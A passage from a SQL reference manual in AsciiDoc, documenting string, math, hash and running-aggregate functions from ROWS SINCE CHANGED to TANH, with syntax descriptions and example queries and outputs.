ROWS SINCE CHANGED\r\n\r\n* Return the number of rows since the value _i1_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n* Return the number of rows since the values _i1_ and _ts_ last changed:\r\n+\r\n```\r\nSELECT ROWS SINCE CHANGED (i1, ts)\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n```\r\n\r\n<<<\r\n[[rpad_function]]\r\n== RPAD Function\r\n\r\nThe RPAD function pads the right side of a string with the specified\r\nstring. Every character in the string, including multi-byte characters,\r\nis treated as one character.\r\n\r\nRPAD is a {project-name} SQL extension.\r\n\r\n```\r\nRPAD (str, len [, padstr])\r\n```\r\n\r\n* `_str_`\r\n+\r\ncan be an expression.\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_len_`\r\n+\r\nidentifies the desired number of characters to be returned and can be an\r\nexpression but must be an integral value. If _len_ is equal to the\r\nlength of the string, no change is made. If _len_ is smaller than the\r\nstring size, the string is truncated.\r\n\r\n* `_pad-character_`\r\n+\r\ncan be an expression and may be a string.\r\n\r\n<<<\r\n[[examples_of_rpad_function]]\r\n=== Examples of RPAD Function\r\n\r\n* This function returns 'kite ':\r\n+\r\n```\r\nRPAD('kite', 7)\r\n```\r\n\r\n* This function returns 'ki':\r\n+\r\n```\r\nRPAD('kite', 2)\r\n```\r\n\r\n* This function returns 'kite0000':\r\n+\r\n```\r\nRPAD('kite', 8, '0')\r\n```\r\n\r\n* This function returns 'go fly a kite':\r\n+\r\n```\r\nRPAD('go fly a kite', 13, 'z')\r\n```\r\n\r\n* This function returns 'go fly a kitez'\r\n+\r\n```\r\nRPAD('go fly a kite', 14, 'z')\r\n```\r\n\r\n* This function returns 'kitegoflygoflygof':\r\n+\r\n```\r\nRPAD('kite', 17, 'gofly' )\r\n```\r\n\r\n<<<\r\n[[rtrim_function]]\r\n== RTRIM Function\r\n\r\nThe RTRIM function removes trailing spaces from a character string. If\r\nyou must remove any leading character other than space, use the TRIM\r\nfunction and specify the value of the character.\r\nSee the <<trim_function,TRIM Function>>.\r\n\r\nRTRIM is a {project-name} SQL extension.\r\n\r\n```\r\nRTRIM (character-expression)\r\n```\r\n\r\n* `_character-expression_`\r\n+\r\nis an SQL character value expression and specifies the string from which\r\nto trim trailing spaces.\r\n+\r\nSee <<character_value_expressions,Character Value Expressions>>.\r\n\r\n[[considerations_for_rtrim]]\r\n=== Considerations for RTRIM\r\n\r\n[[result_of_rtrim]]\r\n==== Result of RTRIM\r\n\r\nThe result is always of type VARCHAR, with maximum length equal to the\r\nfixed length or maximum variable length of _character-expression_.\r\n\r\n[[examples_of_rtrim]]\r\n=== Examples of RTRIM\r\n\r\n* Return ' Robert':\r\n+\r\n```\r\nRTRIM (' Robert ')\r\n```\r\n+\r\nSee <<trim_function,TRIM Function>> and <<ltrim_function,LTRIM Function>>.\r\n\r\n<<<\r\n[[runningavg_function]]\r\n== RUNNINGAVG Function\r\n\r\nThe RUNNINGAVG function is a sequence function that returns the average\r\nof non-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGAVG is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGAVG (_column-expression_)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGAVG returns the average of non-null values of _column-expression_\r\nup to and including the current row.\r\n\r\n[[considerations_for_runningavg]]\r\n=== Considerations for RUNNINGAVG\r\n\r\n[[equivalent_result]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGAVG is equivalent to:\r\n\r\n```\r\nRUNNINGSUM(column-expr) \/ RUNNINGCOUNT(*)\r\n```\r\n\r\n[[examples_of_runningavg]]\r\n=== Examples of RUNNINGAVG\r\n\r\n* Return the average of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGAVG(i1) AS avg_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\navg_i1\r\n--------------------\r\n 6215\r\n 17194\r\n 11463\r\n 9746\r\n 10190\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningcount_function]]\r\n== RUNNINGCOUNT Function\r\n\r\nThe RUNNINGCOUNT function is a sequence function that returns the number\r\nof rows up to and including the current row of an intermediate result\r\ntable ordered by a SEQUENCE BY clause in a SELECT statement. See\r\n<<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGCOUNT is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGCOUNT {(*) | (column-expression)}\r\n```\r\n\r\n* `*`\r\n+\r\nas an argument causes RUNNINGCOUNT(*) to return the number of rows in\r\nthe intermediate result table up to and including the current row.\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression. If _column-expression_ is the argument, RUNNINGCOUNT returns\r\nthe number of rows containing non-null values of _column-expression_ in the\r\nintermediate result table up to and including the current row.\r\n\r\n\r\n[[considerations_for_runningcount]]\r\n=== Considerations for RUNNINGCOUNT\r\n\r\n[[no_distinct_clause]]\r\n==== No DISTINCT Clause\r\n\r\nThe RUNNINGCOUNT sequence function is defined differently from the COUNT\r\naggregate function. If you specify DISTINCT for the COUNT aggregate\r\nfunction, duplicate values are eliminated before COUNT is applied. You\r\ncannot specify DISTINCT for the RUNNINGCOUNT sequence function;\r\nduplicate values are counted.\r\n\r\n<<<\r\n[[examples_of_runningcount]]\r\n=== Examples of RUNNINGCOUNT\r\n\r\n* Return the number of rows that include non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGCOUNT (i1) AS count_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\ncount_i1\r\n------------\r\n 1\r\n 2\r\n 2\r\n 3\r\n 4\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmax_function]]\r\n== RUNNINGMAX Function\r\n\r\nThe RUNNINGMAX function is a sequence function that returns the maximum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMAX is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMAX (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMAX returns the maximum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n\r\n[[examples_of_runningmax]]\r\n=== Examples of RUNNINGMAX\r\n\r\n* Return the maximum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMAX(i1) AS max_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmax_i1\r\n------------\r\n 6215\r\n 28174\r\n 28174\r\n 28174\r\n 28174\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningmin_function]]\r\n== RUNNINGMIN Function\r\n\r\nThe RUNNINGMIN function is a sequence function that returns the minimum\r\nof values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGMIN is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGMIN (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGMIN returns the minimum of values of _column-expression_ up to\r\nand including the current row.\r\n\r\n[[examples_of_runningmin]]\r\n=== Examples of RUNNINGMIN\r\n\r\n* Return the minimum of values of _i1_ up to and including the current row:\r\n+\r\n```\r\nSELECT RUNNINGMIN(i1) AS min_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nmin_i1\r\n------------\r\n 6215\r\n 6215\r\n 6215\r\n 4597\r\n 4597\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningstddev_function]]\r\n=== RUNNINGSTDDEV Function\r\n\r\nThe RUNNINGSTDDEV function is a sequence function that returns the\r\nstandard deviation of non-null values of a column up to and including the\r\ncurrent row of an intermediate result table ordered by a SEQUENCE BY\r\nclause in a SELECT statement.\r\nSee <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSTDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSTDDEV (_column-expression_)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSTDDEV returns the standard deviation of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[considerations_for_runningstddev]]\r\n=== Considerations for RUNNINGSTDDEV\r\n\r\n[[equivalent_result]]\r\n==== Equivalent Result\r\n\r\nThe result of RUNNINGSTDDEV is equivalent to:\r\n\r\n```\r\nSQRT(RUNNINGVARIANCE(column-expression))\r\n```\r\n\r\n<<<\r\n[[examples_of_runningstddev]]\r\n=== Examples of RUNNINGSTDDEV\r\n\r\n* Return the standard deviation of non-null values of _i1_ up to and\r\nincluding the current row:\r\n+\r\n```\r\nSELECT RUNNINGSTDDEV (i1) AS stddev_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nSTDDEV_I1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 1.55273578080753976E+004\r\n 1.48020166531456112E+004\r\n 1.25639147428923072E+004\r\n 1.09258501408357232E+004\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGSTDDEV(i1) AS DEC(18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 5527.357\r\n 14802.016\r\n 12563.914\r\n 10925.850\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningsum_function]]\r\n== RUNNINGSUM Function\r\n\r\nThe RUNNINGSUM function is a sequence function that returns the sum of\r\nnon-null values of a column up to and including the current row of an\r\nintermediate result table ordered by a SEQUENCE BY clause in a SELECT\r\nstatement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGSUM is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGSUM (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGSUM returns the sum of non-null values of _column-expression_ up\r\nto and including the current row.\r\n\r\n[[examples_of_runningsum]]\r\n=== Examples of RUNNINGSUM\r\n\r\n* Return the sum of non-null values of _i1_ up to and including the current\r\nrow:\r\n+\r\n```\r\nSELECT RUNNINGSUM(i1) AS sum_i1\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\nsum_i1\r\n--------------------\r\n 6215\r\n 34389\r\n 34389\r\n 38986\r\n 50952\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[runningvariance_function]]\r\n== RUNNINGVARIANCE Function\r\n\r\nThe RUNNINGVARIANCE function is a sequence function that returns the\r\nvariance of non-null values of a column up to and including the current\r\nrow of an intermediate result table ordered by a SEQUENCE BY clause in a\r\nSELECT statement. See <<sequence_by_clause,SEQUENCE BY Clause>>.\r\n\r\nRUNNINGVARIANCE is a {project-name} SQL extension.\r\n\r\n```\r\nRUNNINGVARIANCE (column-expression)\r\n```\r\n\r\n* `_column-expression_`\r\n+\r\nspecifies a derived column determined by the evaluation of the column\r\nexpression.\r\n+\r\nRUNNINGVARIANCE returns the variance of non-null values of\r\n_column-expression_ up to and including the current row.\r\n\r\n[[examples_of_runningvariance]]\r\n=== Examples of RUNNINGVARIANCE\r\n\r\n* Return the variance of non-null values of _i1_ up to and including the\r\ncurrent row:\r\n+\r\n```\r\nSELECT RUNNINGVARIANCE(i1) AS variance_i1\r\nFROM mining.seqfcn SEQUENCE BY TS;\r\n\r\nvariance_i1\r\n-------------------------\r\n 0.00000000000000000E+000\r\n 2.41098840499999960E+008\r\n 2.19099696999999968E+008\r\n 1.57851953666666640E+008\r\n 1.19374201299999980E+008\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n* You can use the CAST function for display purposes. For example:\r\n+\r\n```\r\nSELECT CAST(RUNNINGVARIANCE (i1) AS DEC (18,3))\r\nFROM mining.seqfcn SEQUENCE BY ts;\r\n\r\n(EXPR)\r\n--------------------\r\n .000\r\n 241098840.500\r\n 219099697.000\r\n 157851953.666\r\n 119374201.299\r\n\r\n--- 5 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[second_function]]\r\n== SECOND Function\r\n\r\nThe SECOND function converts a TIME or TIMESTAMP expression into an\r\nINTEGER value in the range 0 through 59 that represents the\r\ncorresponding second of the hour.\r\n\r\nSECOND is a {project-name} SQL extension.\r\n\r\n```\r\nSECOND (datetime-expression)\r\n```\r\n\r\n* `_datetime-expression_`\r\n+\r\nis an expression that evaluates to a datetime value of type TIME or\r\nTIMESTAMP. See <<datetime_value_expressions,Datetime Value Expressions>>.\r\n\r\n[[examples_of_second]]\r\n=== Examples of SECOND\r\n\r\n* Return a numeric value that represents the second of the hour from the\r\n_ship_timestamp_ column:\r\n\r\n```\r\nSELECT start_date, ship_timestamp, SECOND(ship_timestamp)\r\nFROM persnl.project\r\nWHERE projcode = 1000;\r\n\r\nStart\/Date Time\/Shipped (EXPR)\r\n---------- -------------------------- -----------\r\n2008-04-10 2008-04-21 08:15:00.000000 .000000\r\n```\r\n\r\n<<<\r\n[[sha_function]]\r\n== SHA Function\r\n\r\nCalculates an SHA-1 160-bit checksum for the string, as described in \r\nRFC 3174 (Secure Hash Algorithm). The value is returned as a string of \r\n40 hexadecimal digits, or NULL if the argument was NULL. \r\n\r\n[[examples_of_sha]]\r\n=== examples of SHA\r\n```\r\n>>SELECT SHA1('abc') from dual;\r\n\r\n(EXPR)\r\n-----------------------------------------\r\n'a9993e364706816aba3e25717850c26c9cd0d89d'\r\n```\r\n\r\n<<<\r\n[[sha2_function]]\r\n== SHA2 Function\r\n\r\nCalculates the SHA-2 family of hash functions (SHA-224, SHA-256, SHA-384, \r\nand SHA-512). The first argument is the cleartext string to be hashed. \r\nThe second argument indicates the desired bit length of the result, which \r\nmust have a value of 224, 256, 384, 512.\r\nIf either argument is NULL or the hash length is not one of the permitted values, \r\nthe return value is NULL. Otherwise, the function result is a hash value containing \r\nthe desired number of bits. See the notes at the beginning of this section \r\nabout storing hash values efficiently.\r\n\r\n[[examples_of_sha2]]\r\n=== examples of SHA2\r\n```\r\n>>SELECT SHA2('abc', 224) from dual;\r\n\r\n(EXPR)\r\n--------------------------------------------------------\r\n'23097d223405d8228642a477bda255b32aadbce4bda0b3f7e36c9da7'\r\n```\r\n<<<\r\n[[sign_function]]\r\n== SIGN Function\r\n\r\nThe SIGN function returns an indicator of the sign of a numeric value\r\nexpression. If the value is less than zero, the function returns -1 as\r\nthe indicator. If the value is zero, the function returns 0. If the\r\nvalue is greater than zero, the function returns 1.\r\n\r\nSIGN is a {project-name} SQL extension.\r\n\r\n```\r\nSIGN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIGN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sign]]\r\n=== Examples of SIGN\r\n\r\n* Return the value -1:\r\n+\r\n```\r\nSIGN(-20 + 12)\r\n```\r\n\r\n* Return the value 0:\r\n+\r\n```\r\nSIGN(-20 + 20)\r\n```\r\n\r\n* Return the value 1:\r\n+\r\n```\r\nSIGN(-20 + 22)\r\n```\r\n\r\n<<<\r\n[[sin_function]]\r\n== SIN Function\r\n\r\nThe SIN function returns the SINE of a numeric value expression, where\r\nthe expression is an angle expressed in radians.\r\n\r\nSIN is a {project-name} SQL extension.\r\n\r\n```\r\nSIN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SIN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sin]]\r\n=== Examples of SIN\r\n\r\n* This function returns the value 3.42052233254419840E-001, or\r\napproximately 0.3420, the sine of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nSIN (0.3491)\r\n```\r\n\r\n<<<\r\n[[sinh_function]]\r\n== SINH Function\r\n\r\nThe SINH function returns the hyperbolic sine of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nSINH is a {project-name} SQL extension.\r\n\r\n```\r\nSINH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SINH function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sinh]]\r\n=== Examples of SINH\r\n\r\n* This function returns the value 1.60191908030082560E+000, or\r\napproximately 1.6019, the hyperbolic sine of 1.25:\r\n+\r\n```\r\nSINH (1.25)\r\n```\r\n\r\n<<<\r\n[[space_function]]\r\n=== SPACE Function\r\n\r\nThe SPACE function returns a character string consisting of a specified\r\nnumber of spaces, each of which is 0x20 or 0x0020, depending on the\r\nchosen character set.\r\n\r\nSPACE is a {project-name} SQL extension.\r\n\r\n```\r\nSPACE (length [, char-set-name])\r\n```\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to be returned. The number _count_\r\nmust be a value greater than or equal to zero of exact numeric data type\r\nand with a scale of zero. _length_ cannot exceed 32768 for the ISO8859-1\r\nor UTF8 character sets.\r\n\r\n* `_char-set-name_`\r\n+\r\ncan be ISO88591 or UTF8. If you do not specify this second argument, the\r\ndefault is the default character set.\r\n+\r\nThe returned character string will be of data type VARCHAR associated\r\nwith the character set specified by _char-set-name_.\r\n\r\n[[examples_of_space]]\r\n=== Examples of SPACE\r\n\r\n* Return three spaces:\r\n+\r\n```\r\nSPACE(3)\r\n```\r\n\r\n<<<\r\n[[sqrt_function]]\r\n== SQRT Function\r\n\r\nThe SQRT function returns the square root of a numeric value expression.\r\nSQRT is a {project-name} SQL extension.\r\n\r\n```\r\nSQRT (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the SQRT function. The value of the argument must not be a\r\nnegative number. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_sqrt]]\r\n=== Examples of SQRT\r\n\r\n* This function returns the value 5.19615242270663232e+000, or\r\napproximately 5.196:\r\n+\r\n```\r\nSQRT(27)\r\n```\r\n\r\n<<<\r\n[[stddev_function]]\r\n== STDDEV Function\r\n\r\nSTDDEV is an aggregate function that returns the standard deviation of a\r\nset of numbers. STDDEV is a {project-name} SQL extension.\r\n\r\n```\r\nSTDDEV ([ALL | DISTINCT] expression [, weight])\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe STDDEV of the _expression_. The default option is ALL, which\r\ncauses duplicate values to be included. If you specify DISTINCT,\r\nduplicate values are eliminated before the STDDEV function is applied.\r\nIf DISTINCT is specified, you cannot specify _weight_.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric value expression that determines the values for\r\nwhich to compute the standard deviation. The _expression_ cannot contain\r\nan aggregate function or a subquery. The DISTINCT clause specifies that\r\nthe STDDEV function operates on distinct values from the one-column\r\ntable derived from the evaluation of _expression_.\r\n\r\n* `_weight_`\r\n+\r\nspecifies a numeric value expression that determines the weights of the\r\nvalues for which to compute the standard deviation. _weight_ cannot\r\ncontain an aggregate function or a subquery. _weight_ is defined on\r\nthe same table as _expression_. The one-column table derived from the\r\nevaluation of _expression_ and the one-column table derived from the\r\nevaluation of _weight_ must have the same cardinality.\r\n\r\n[[considerations_for_stddev]]\r\n=== Considerations for STDDEV\r\n\r\n[[definition_of_stddev]]\r\n==== Definition of STDDEV\r\n\r\nThe standard deviation of a value expression is defined to be the square\r\nroot of the variance of the expression.\r\nSee <<variance_function,VARIANCE Function>>.\r\n\r\nBecause the definition of variance has _N-1_ in the denominator of the\r\nexpression (if weight is not specified), {project-name} SQL returns a\r\nsystem-defined default setting of zero (and no error) if the number of\r\nrows in the table, or a group of the table, is equal to 1.\r\n\r\n[[data_type_of_the_result]]\r\n==== Data Type of the Result\r\n\r\nThe data type of the result is always DOUBLE PRECISION.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result table\r\nbut cannot include an aggregate function. These are valid:\r\n\r\n```\r\nSTDDEV (SALARY) STDDEV (SALARY * 1.1)\r\nSTDDEV (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[stddev_nulls]]\r\n==== Nulls\r\n\r\nSTDDEV is evaluated after eliminating all nulls from the set. If the\r\nresult table is empty, STDDEV returns NULL.\r\n\r\n[[float54_and_double_precision_data]]\r\n==== FLOAT(54) and DOUBLE PRECISION Data\r\n\r\nAvoid using large FLOAT(54) or DOUBLE PRECISION values as arguments to\r\nSTDDEV. If SUM(x * x) exceeds the value of 1.15792089237316192e77 during the computation\r\nof STDDEV(x), a numeric overflow occurs.\r\n\r\n<<<\r\n[[examples_of_stddev]]\r\n=== Examples of STDDEV\r\n\r\n* Compute the standard deviation of the salary of the current employees:\r\n+\r\n```\r\nSELECT STDDEV(salary) AS StdDev_Salary FROM persnl.employee;\r\n\r\nSTDDEV_SALARY\r\n-------------------------\r\n 3.57174062500000000E+004\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n* Compute the standard deviation of the cost of parts in the current\r\ninventory:\r\n+\r\n```\r\nSELECT STDDEV (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n-------------------------\r\n 7.13899499999999808E+006\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[substring_function]]\r\n== SUBSTRING\/SUBSTR Function\r\n\r\nThe SUBSTRING function extracts a substring out of a given character\r\nexpression. It returns a character string of data type VARCHAR, with a\r\nmaximum length equal to the smaller of these two:\r\n\r\n\r\n* The fixed length of the input string (for CHAR-type strings) or the\r\nmaximum variable length (for VARCHAR-type strings)\r\n* The value of the length argument (when a constant is specified) or\r\n32708 (when a non-constant is specified)\r\n\r\nSUBSTR is equivalent to SUBSTRING.\r\n\r\n```\r\nSUBSTRING (character-expr FROM start-position [FOR length])\r\n```\r\n\r\nor:\r\n\r\n```\r\nSUBSTRING (character-expr, start-position [, length])\r\n```\r\n\r\n* `_character-expr_`\r\n+\r\nspecifies the source string from which to extract the substring. The\r\nsource string is an SQL character value expression. The operand is the\r\nresult of evaluating _character-expr_. See\r\n<<character_value_expressions,Character Value Expressions>>.\r\n\r\n* `_start-position_`\r\n+\r\nspecifies the starting position _start-position_ within _character-expr_\r\nat which to start extracting the substring. _start-position_ must be a\r\nvalue with an exact numeric data type and a scale of zero.\r\n\r\n* `_length_`\r\n+\r\nspecifies the number of characters to extract from _character-expr_.\r\nKeep in mind that every character, including multi-byte characters,\r\ncounts as one character. _length_ is the length of the extracted\r\nsubstring and must be a value greater than or equal to zero of exact\r\nnumeric data type and with a scale of zero. The _length_ field is\r\noptional, so if you do not specify the substring _length_, all\r\ncharacters starting at _start-position_ and continuing until the end of\r\nthe character expression are returned.\r\n+\r\nThe length field is optional. If you do not specify it, all characters\r\nstarting at _start-position_\r\nand continuing until the end of the _character-expr_ are returned.\r\n\r\n[[alternative_forms]]\r\n=== Alternative Forms\r\n\r\n* The SUBSTRING function treats SUBSTRING( _string_ FOR _int_ )\r\nequivalent to SUBSTRING( _string_ FROM 1 FOR _int_ ). The {project-name}\r\ndatabase software already supports the ANSI standard form as:\r\n+\r\n```\r\nSUBSTRING(string FROM int [ FOR int ])\r\n```\r\n\r\n* The SUBSTRING function treats SUBSTRING (_string_, Fromint)\r\nequivalent to SUBSTRING(_string_ FROM _Fromint_). The {project-name}\r\ndatabase software already supports SUBSTRING (_string_, _Fromint_,\r\n_Forint_) as equivalent to the ANSI standard form:\r\n+\r\n```\r\nSUBSTRING(string FROM Fromint FOR Forint)\r\n```\r\n\r\n[[considerations_for_substring]]\r\n=== Considerations for SUBSTRING\/SUBSTR\r\n\r\n[[requirements_for_the_expression_length_and_start_position]]\r\n==== Requirements for the Expression, Length, and Start Position\r\n\r\n* The data types of the substring length and the start position must be\r\nnumeric with a scale of zero. Otherwise, an error is returned.\r\n* If the sum of the start position and the substring length is greater\r\nthan the length of the character expression, the substring from the\r\nstart position to the end of the string is returned.\r\n* If the start position is greater than the length of the character\r\nexpression, an empty string ('') is returned.\r\n* The resulting substring is always of type VARCHAR. If the source\r\ncharacter string is an up-shifted CHAR or VARCHAR string, the result is\r\nan up-shifted VARCHAR type.\r\n\r\n<<<\r\n[[examples_of_substring]]\r\n=== Examples of SUBSTRING\/SUBSTR\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING('Robert John Smith' FROM 0 FOR 3)\r\nSUBSTR('Robert John Smith' FROM 0 FOR 3)\r\n```\r\n\r\n* Extract 'John':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 4)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 4)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8)\r\nSUBSTR ('Robert John Smith' FROM 8)\r\n```\r\n\r\n* Extract 'Robert John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 1 FOR 17)\r\nSUBSTR ('Robert John Smith' FROM 1 FOR 17)\r\n```\r\n\r\n* Extract 'John Smith':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 15)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 15)\r\n```\r\n\r\n* Extract 'Ro':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM -2 FOR 5)\r\nSUBSTR ('Robert John Smith' FROM -2 FOR 5)\r\n```\r\n\r\n* Extract an empty string '':\r\n+\r\n```\r\nSUBSTRING ('Robert John Smith' FROM 8 FOR 0)\r\nSUBSTR ('Robert John Smith' FROM 8 FOR 0)\r\n```\r\n\r\n<<<\r\n[[sum_function]]\r\n== SUM Function\r\n\r\nSUM is an aggregate function that returns the sum of a set of numbers.\r\n\r\n```\r\nSUM ([ALL | DISTINCT] expression)\r\n```\r\n\r\n* `ALL | DISTINCT`\r\n+\r\nspecifies whether duplicate values are included in the computation of\r\nthe SUM of the _expression_. The default option is ALL, which causes\r\nduplicate values to be included. If you specify DISTINCT, duplicate\r\nvalues are eliminated before the SUM function is applied.\r\n\r\n* `_expression_`\r\n+\r\nspecifies a numeric or interval value expression that determines the\r\nvalues to sum. The _expression_ cannot contain an aggregate function or\r\na subquery. The DISTINCT clause specifies that the SUM function operates\r\non distinct values from the one-column table derived from the evaluation\r\nof _expression_. All nulls are eliminated before the function is\r\napplied to the set of values. If the result table is empty, SUM returns\r\nNULL. See <<expressions,Expressions>>.\r\n\r\n[[considerations_for_sum]]\r\n=== Considerations for SUM\r\n\r\n[[data_type_and_scale_of_the_result]]\r\n==== Data Type and Scale of the Result\r\n\r\nThe data type of the result depends on the data type of the argument. If\r\nthe argument is an exact numeric type, the result is LARGEINT. If the\r\nargument is an approximate numeric type, the result\r\nis DOUBLE PRECISION. If the argument is INTERVAL data type, the result\r\nis INTERVAL with the same precision as the argument. The scale of the\r\nresult is the same as the scale of the argument. If the argument has no\r\nscale, the result is truncated.\r\n\r\n[[operands_of_the_expression]]\r\n==== Operands of the Expression\r\n\r\nThe expression includes columns from the rows of the SELECT result\r\ntable — but cannot include an aggregate function. The valid expressions\r\nare:\r\n\r\n```\r\nSUM (SALARY)\r\nSUM (SALARY * 1.1)\r\nSUM (PARTCOST * QTY_ORDERED)\r\n```\r\n\r\n[[examples_of_sum]]\r\n=== Examples of SUM\r\n\r\n* Compute the total value of parts in the current inventory:\r\n+\r\n```\r\nSELECT SUM (price * qty_available) FROM sales.parts;\r\n\r\n(EXPR)\r\n---------------------\r\n 117683505.96\r\n\r\n--- 1 row(s) selected.\r\n```\r\n\r\n<<<\r\n[[tan_function]]\r\n== TAN Function\r\n\r\nThe TAN function returns the tangent of a numeric value expression,\r\nwhere the expression is an angle expressed in radians.\r\n\r\nTAN is a {project-name} SQL extension.\r\n\r\n```\r\nTAN (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TAN function.\r\nSee <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tan]]\r\n=== Examples of TAN\r\n\r\n* This function returns the value 3.64008908293626880E-001, or\r\napproximately 0.3640, the tangent of 0.3491 (which is 20 degrees):\r\n+\r\n```\r\nTAN (0.3491)\r\n```\r\n\r\n<<<\r\n[[tanh_function]]\r\n=== TANH Function\r\n\r\nThe TANH function returns the hyperbolic tangent of a numeric value\r\nexpression, where the expression is an angle expressed in radians.\r\n\r\nTANH is a {project-name} SQL extension.\r\n\r\n```\r\nTANH (numeric-expression)\r\n```\r\n\r\n* `_numeric-expression_`\r\n+\r\nis an SQL numeric value expression that specifies the value for the\r\nargument of the TANH\r\nfunction. See <<numeric_value_expressions,Numeric Value Expressions>>.\r\n\r\n[[examples_of_tanh]]\r\n=== Examples of TANH\r\n\r\n* This function returns the value 